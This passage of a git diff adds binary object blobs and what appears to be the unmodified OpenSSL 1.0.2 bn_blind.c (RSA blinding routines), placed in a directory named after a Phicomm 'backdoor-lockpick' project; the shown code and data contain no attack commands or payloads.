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
Yt-m6_ZFK+3f9!AiP}{xw*nR*10rt*C^Z)<=

literal 0
HcmV?d00001

diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_blind.c b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_blind.c
new file mode 100644
index 0000000..d448daa
--- /dev/null
+++ b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_blind.c
@@ -0,0 +1,385 @@
+/* crypto/bn/bn_blind.c */
+/* ====================================================================
+ * Copyright (c) 1998-2006 The OpenSSL Project.  All rights reserved.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ *
+ * 1. Redistributions of source code must retain the above copyright
+ *    notice, this list of conditions and the following disclaimer.
+ *
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in
+ *    the documentation and/or other materials provided with the
+ *    distribution.
+ *
+ * 3. All advertising materials mentioning features or use of this
+ *    software must display the following acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit. (http://www.openssl.org/)"
+ *
+ * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to
+ *    endorse or promote products derived from this software without
+ *    prior written permission. For written permission, please contact
+ *    openssl-core@openssl.org.
+ *
+ * 5. Products derived from this software may not be called "OpenSSL"
+ *    nor may "OpenSSL" appear in their names without prior written
+ *    permission of the OpenSSL Project.
+ *
+ * 6. Redistributions of any form whatsoever must retain the following
+ *    acknowledgment:
+ *    "This product includes software developed by the OpenSSL Project
+ *    for use in the OpenSSL Toolkit (http://www.openssl.org/)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY
+ * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR
+ * PURPOSE ARE DISCLAIMED.  IN NO EVENT SHALL THE OpenSSL PROJECT OR
+ * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
+ * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT
+ * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
+ * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT,
+ * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
+ * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED
+ * OF THE POSSIBILITY OF SUCH DAMAGE.
+ * ====================================================================
+ *
+ * This product includes cryptographic software written by Eric Young
+ * (eay@cryptsoft.com).  This product includes software written by Tim
+ * Hudson (tjh@cryptsoft.com).
+ *
+ */
+/* Copyright (C) 1995-1998 Eric Young (eay@cryptsoft.com)
+ * All rights reserved.
+ *
+ * This package is an SSL implementation written
+ * by Eric Young (eay@cryptsoft.com).
+ * The implementation was written so as to conform with Netscapes SSL.
+ *
+ * This library is free for commercial and non-commercial use as long as
+ * the following conditions are aheared to.  The following conditions
+ * apply to all code found in this distribution, be it the RC4, RSA,
+ * lhash, DES, etc., code; not just the SSL code.  The SSL documentation
+ * included with this distribution is covered by the same copyright terms
+ * except that the holder is Tim Hudson (tjh@cryptsoft.com).
+ *
+ * Copyright remains Eric Young's, and as such any Copyright notices in
+ * the code are not to be removed.
+ * If this package is used in a product, Eric Young should be given attribution
+ * as the author of the parts of the library used.
+ * This can be in the form of a textual message at program startup or
+ * in documentation (online or textual) provided with the package.
+ *
+ * Redistribution and use in source and binary forms, with or without
+ * modification, are permitted provided that the following conditions
+ * are met:
+ * 1. Redistributions of source code must retain the copyright
+ *    notice, this list of conditions and the following disclaimer.
+ * 2. Redistributions in binary form must reproduce the above copyright
+ *    notice, this list of conditions and the following disclaimer in the
+ *    documentation and/or other materials provided with the distribution.
+ * 3. All advertising materials mentioning features or use of this software
+ *    must display the following acknowledgement:
+ *    "This product includes cryptographic software written by
+ *     Eric Young (eay@cryptsoft.com)"
+ *    The word 'cryptographic' can be left out if the rouines from the library
+ *    being used are not cryptographic related :-).
+ * 4. If you include any Windows specific code (or a derivative thereof) from
+ *    the apps directory (application code) you must include an acknowledgement:
+ *    "This product includes software written by Tim Hudson (tjh@cryptsoft.com)"
+ *
+ * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND
+ * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
+ * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
+ * ARE DISCLAIMED.  IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE
+ * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL
+ * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS
+ * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION)
+ * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT
+ * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY
+ * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF
+ * SUCH DAMAGE.
+ *
+ * The licence and distribution terms for any publically available version or
+ * derivative of this code cannot be changed.  i.e. this code cannot simply be
+ * copied and put under another distribution licence
+ * [including the GNU Public Licence.]
+ */
+
+#include <stdio.h>
+#include "cryptlib.h"
+#include "bn_lcl.h"
+
+#define BN_BLINDING_COUNTER     32
+
+struct bn_blinding_st {
+    BIGNUM *A;
+    BIGNUM *Ai;
+    BIGNUM *e;
+    BIGNUM *mod;                /* just a reference */
+#ifndef OPENSSL_NO_DEPRECATED
+    unsigned long thread_id;    /* added in OpenSSL 0.9.6j and 0.9.7b; used
+                                 * only by crypto/rsa/rsa_eay.c, rsa_lib.c */
+#endif
+    CRYPTO_THREADID tid;
+    int counter;
+    unsigned long flags;
+    BN_MONT_CTX *m_ctx;
+    int (*bn_mod_exp) (BIGNUM *r, const BIGNUM *a, const BIGNUM *p,
+                       const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx);
+};
+
+BN_BLINDING *BN_BLINDING_new(const BIGNUM *A, const BIGNUM *Ai, BIGNUM *mod)
+{
+    BN_BLINDING *ret = NULL;
+
+    bn_check_top(mod);
+
+    if ((ret = (BN_BLINDING *)OPENSSL_malloc(sizeof(BN_BLINDING))) == NULL) {
+        BNerr(BN_F_BN_BLINDING_NEW, ERR_R_MALLOC_FAILURE);
+        return (NULL);
+    }
+    memset(ret, 0, sizeof(BN_BLINDING));
+    if (A != NULL) {
+        if ((ret->A = BN_dup(A)) == NULL)
+            goto err;
+    }
+    if (Ai != NULL) {
+        if ((ret->Ai = BN_dup(Ai)) == NULL)
+            goto err;
+    }
+
+    /* save a copy of mod in the BN_BLINDING structure */
+    if ((ret->mod = BN_dup(mod)) == NULL)
+        goto err;
+    if (BN_get_flags(mod, BN_FLG_CONSTTIME) != 0)
+        BN_set_flags(ret->mod, BN_FLG_CONSTTIME);
+
+    /*
+     * Set the counter to the special value -1 to indicate that this is
+     * never-used fresh blinding that does not need updating before first
+     * use.
+     */
+    ret->counter = -1;
+    CRYPTO_THREADID_current(&ret->tid);
+    return (ret);
+ err:
+    if (ret != NULL)
+        BN_BLINDING_free(ret);
+    return (NULL);
+}
+
+void BN_BLINDING_free(BN_BLINDING *r)
+{
+    if (r == NULL)
+        return;
+
+    if (r->A != NULL)
+        BN_free(r->A);
+    if (r->Ai != NULL)
+        BN_free(r->Ai);
+    if (r->e != NULL)
+        BN_free(r->e);
+    if (r->mod != NULL)
+        BN_free(r->mod);
+    OPENSSL_free(r);
+}
+
+int BN_BLINDING_update(BN_BLINDING *b, BN_CTX *ctx)
+{
+    int ret = 0;
+
+    if ((b->A == NULL) || (b->Ai == NULL)) {
+        BNerr(BN_F_BN_BLINDING_UPDATE, BN_R_NOT_INITIALIZED);
+        goto err;
+    }
+
+    if (b->counter == -1)
+        b->counter = 0;
+
+    if (++b->counter == BN_BLINDING_COUNTER && b->e != NULL &&
+        !(b->flags & BN_BLINDING_NO_RECREATE)) {
+        /* re-create blinding parameters */
+        if (!BN_BLINDING_create_param(b, NULL, NULL, ctx, NULL, NULL))
+            goto err;
+    } else if (!(b->flags & BN_BLINDING_NO_UPDATE)) {
+        if (!BN_mod_mul(b->A, b->A, b->A, b->mod, ctx))
+            goto err;
+        if (!BN_mod_mul(b->Ai, b->Ai, b->Ai, b->mod, ctx))
+            goto err;
+    }
+
+    ret = 1;
+ err:
+    if (b->counter == BN_BLINDING_COUNTER)
+        b->counter = 0;
+    return (ret);
+}
+
+int BN_BLINDING_convert(BIGNUM *n, BN_BLINDING *b, BN_CTX *ctx)
+{
+    return BN_BLINDING_convert_ex(n, NULL, b, ctx);
+}
+
+int BN_BLINDING_convert_ex(BIGNUM *n, BIGNUM *r, BN_BLINDING *b, BN_CTX *ctx)
+{
+    int ret = 1;
+
+    bn_check_top(n);
+
+    if ((b->A == NULL) || (b->Ai == NULL)) {
+        BNerr(BN_F_BN_BLINDING_CONVERT_EX, BN_R_NOT_INITIALIZED);
+        return (0);
+    }
+
+    if (b->counter == -1)
+        /* Fresh blinding, doesn't need updating. */
+        b->counter = 0;
+    else if (!BN_BLINDING_update(b, ctx))
+        return (0);
+
+    if (r != NULL) {
+        if (!BN_copy(r, b->Ai))
+            ret = 0;
+    }
+
+    if (!BN_mod_mul(n, n, b->A, b->mod, ctx))
+        ret = 0;
+
+    return ret;
+}
+
+int BN_BLINDING_invert(BIGNUM *n, BN_BLINDING *b, BN_CTX *ctx)
+{
+    return BN_BLINDING_invert_ex(n, NULL, b, ctx);
+}
+
+int BN_BLINDING_invert_ex(BIGNUM *n, const BIGNUM *r, BN_BLINDING *b,
+                          BN_CTX *ctx)
+{
+    int ret;
+
+    bn_check_top(n);
+
+    if (r != NULL)
+        ret = BN_mod_mul(n, n, r, b->mod, ctx);
+    else {
+        if (b->Ai == NULL) {
+            BNerr(BN_F_BN_BLINDING_INVERT_EX, BN_R_NOT_INITIALIZED);
+            return (0);
+        }
+        ret = BN_mod_mul(n, n, b->Ai, b->mod, ctx);
+    }
+
+    bn_check_top(n);
+    return (ret);
+}
+
+#ifndef OPENSSL_NO_DEPRECATED
+unsigned long BN_BLINDING_get_thread_id(const BN_BLINDING *b)
+{
+    return b->thread_id;
+}
+
+void BN_BLINDING_set_thread_id(BN_BLINDING *b, unsigned long n)
+{
+    b->thread_id = n;
+}
+#endif
+
+CRYPTO_THREADID *BN_BLINDING_thread_id(BN_BLINDING *b)
+{
+    return &b->tid;
+}
+
+unsigned long BN_BLINDING_get_flags(const BN_BLINDING *b)
+{
+    return b->flags;
+}
+
+void BN_BLINDING_set_flags(BN_BLINDING *b, unsigned long flags)
+{
+    b->flags = flags;
+}
+
+BN_BLINDING *BN_BLINDING_create_param(BN_BLINDING *b,
+                                      const BIGNUM *e, BIGNUM *m, BN_CTX *ctx,
+                                      int (*bn_mod_exp) (BIGNUM *r,
+                                                         const BIGNUM *a,
+                                                         const BIGNUM *p,
+                                                         const BIGNUM *m,
+                                                         BN_CTX *ctx,
+                                                         BN_MONT_CTX *m_ctx),
+                                      BN_MONT_CTX *m_ctx)
+{
+    int retry_counter = 32;
+    BN_BLINDING *ret = NULL;
+
+    if (b == NULL)
+        ret = BN_BLINDING_new(NULL, NULL, m);
+    else
+        ret = b;
+
+    if (ret == NULL)
+        goto err;
+
+    if (ret->A == NULL && (ret->A = BN_new()) == NULL)
+        goto err;
+    if (ret->Ai == NULL && (ret->Ai = BN_new()) == NULL)
+        goto err;
+
+    if (e != NULL) {
+        if (ret->e != NULL)
+            BN_free(ret->e);
+        ret->e = BN_dup(e);
+    }
+    if (ret->e == NULL)
+        goto err;
+
+    if (bn_mod_exp != NULL)
+        ret->bn_mod_exp = bn_mod_exp;
+    if (m_ctx != NULL)
+        ret->m_ctx = m_ctx;
+
+    do {
+        if (!BN_rand_range(ret->A, ret->mod))
+            goto err;
+        if (BN_mod_inverse(ret->Ai, ret->A, ret->mod, ctx) == NULL) {
+            /*
+             * this should almost never happen for good RSA keys
+             */
+            unsigned long error = ERR_peek_last_error();
+            if (ERR_GET_REASON(error) == BN_R_NO_INVERSE) {
+                if (retry_counter-- == 0) {
+                    BNerr(BN_F_BN_BLINDING_CREATE_PARAM,
+                          BN_R_TOO_MANY_ITERATIONS);
+                    goto err;
+                }
+                ERR_clear_error();
+            } else
+                goto err;
+        } else
+            break;
+    } while (1);
+
+    if (ret->bn_mod_exp != NULL && ret->m_ctx != NULL) {
+        if (!ret->bn_mod_exp
+            (ret->A, ret->A, ret->e, ret->mod, ctx, ret->m_ctx))
+            goto err;
+    } else {
+        if (!BN_mod_exp(ret->A, ret->A, ret->e, ret->mod, ctx))
+            goto err;
+    }
+
+    return ret;
+ err:
+    if (b == NULL && ret != NULL) {
+        BN_BLINDING_free(ret);
+        ret = NULL;
+    }
+
+    return ret;
+}
diff --git a/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_blind.o b/Phicomm/backdoor-lockpick_tra-2022-01/openssl-1.0.2/crypto/bn/bn_blind.o
new file mode 100644
index 0000000000000000000000000000000000000000..f98252bd79da62c1f6ee32d75a4b3bc7bb88742c
GIT binary patch
literal 5400
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
